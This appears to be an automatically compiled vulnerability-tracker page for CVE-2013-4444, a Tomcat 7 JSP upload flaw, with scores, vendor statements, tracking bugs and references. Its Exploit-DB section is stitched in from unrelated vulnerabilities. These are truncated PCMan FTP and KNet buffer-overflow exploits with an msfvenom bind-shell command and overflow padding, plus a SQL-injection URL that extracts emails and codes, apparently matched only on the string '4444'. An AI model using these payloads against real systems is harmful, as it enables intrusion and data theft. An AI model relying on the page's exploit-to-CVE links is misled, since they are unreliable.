CVE-2013-4444
Published 2014-09-12
Priority: P3 50, medium, 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EPSS: 13.99% (96.1th percentile)
Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.
Affected
35 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | tomcat | <= 7.0.39 | — |
CVSS provenance
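| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| osv | — | 6.8 | MEDIUM | — |
| vendor_redhat | — | 7.5 | HIGH | — |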
OSV
Apache Tomcat Unrestricted file upload vulnerability
osv·2022-05-13
CVE-2013-4444 [MEDIUM] Apache Tomcat Unrestricted file upload vulnerability
GHSA
Apache Tomcat Unrestricted file upload vulnerability
ghsa·2022-05-13
CVE-2013-4444 [MEDIUM] CWE-94 Apache Tomcat Unrestricted file upload vulnerability
OSV
CVE-2013-4444: Unrestricted file upload vulnerability in Apache Tomcat 7
osv·2014-09-12·CVSS 6.8
CVE-2013-4444 [MEDIUM] CVE-2013-4444: Unrestricted file upload vulnerability in Apache Tomcat 7
Red Hat
tomcat: remote code execution via uploaded JSP
vendor_redhat·2014-09-10·CVSS 7.5
CVE-2013-4444 [HIGH] tomcat: remote code execution via uploaded JSP
Statement: Not Vulnerable. This issue did not affect the versions of Tomcat and JBoss Web as shipped with any Red Hat product, as this flaw was handled by Red Hat as CVE-2013-2185. This flaw is to be considered a duplicate of CVE-2013-4444.
Package: tomcat6 (Red Hat Enterprise Linux 6) - Not affected
Package: tomcat (Red Hat Enterprise Linux 7) - Not affected
Package: jbossweb (Red Hat JBoss Data Grid 6) - Not affected
Package: jbossweb (Red Hat JBoss Data Virtualization 6) - Not affecte
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
exploitdb·2015-08-29
CVE-2013-4730 PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
# Date: 29 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3
import socket
import sys
# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
Exploit-DB
PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
exploitdb·2015-02-14
CVE-2013-4730 PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
---
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
# Date : 12/02/2015
# Author: R-73eN
# Software: PCMan FTP Server v2.0.7
# Tested On Windows Xp SP3
import socket
#348 Bytes Bind Shell Port TCP/4444
Exploit-DB
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
import socket as s
from sys import argv
#
if(len(argv) != 4):
    print "USAGE: %s host " % argv[0]
    exit(1)
else:
    #store command line arguments
    script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
Exploit-DB
PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
import socket as s
from sys import argv
#
if(len(argv) != 4):
    print "USAGE: %s host " % argv[0]
    exit(1)
else:
    #store command line arguments
    script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
Exploit-DB
Craigslist Gold - SQL Injection
exploitdb·2013-05-06
---
# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability
# Date: 04/05/2013
# Author: Fallaga
# Team: FaLLaGa Tunisian Hackers
# Script url: http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html
# Version: N/A
# Tested on: Demo
# CVE : ()
############################################################
#######################
#########################[ EXPL0!T ]#########################
http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads--
#############################SwT 4 Ever##########################
####################
@JaMbA !! GreeTz: Fallaga Team + all tunisian people
Exploit-DB
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
exploitdb·2013-03-29
CVE-2005-0575 KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
---
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
Bugzilla
CVE-2013-4444 tomcat: remote code execution via uploaded JSP [epel-6]
bugzilla·2014-09-10·CVSS 7.5
CVE-2013-4444 [HIGH] CVE-2013-4444 tomcat: remote code execution via uploaded JSP [epel-6]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
epel-6 tracking bug for tomcat: see blocks bug list for ful
Bugzilla
CVE-2013-4444 tomcat: remote code execution via uploaded JSP
bugzilla·2014-09-10·CVSS 6.8
CVE-2013-4444 [MEDIUM] CVE-2013-4444 tomcat: remote code execution via uploaded JSP
As reported fixed in Apache Tomcat 7.0.40 [1]:
In very limited circumstances, it was possible for an attacker to upload a malicious JSP to a Tomcat server and then trigger the execution of that JSP. While Remote Code Execution would normally be viewed as a critical vulnerability, the circumstances under which this is possible are, in the view of the Tomcat security team, sufficiently limited that this vulnerability is viewed as important.
For this attack to succeed all of the following requirements must be met:
1. Using Oracle Java 1.7.0 update 25 or earlier (or any other Java implementation where java.io.File is vulnerable to null byte injection).
2. A web application must be deployed to a vulnerable version of Tomcat.
3. Th
http://archives.neohapsis.com/archives/bugtraq/2014-09/0075.html
http://marc.info/?l=bugtraq&m=144498216801440&w=2
http://openwall.com/lists/oss-security/2014/10/24/12
http://seclists.org/fulldisclosure/2021/Jan/23
http://tomcat.apache.org/security-7.html
http://www.debian.org/security/2016/dsa-3447
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
http://www.securityfocus.com/bid/69728
http://www.securitytracker.com/id/1030834
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04851013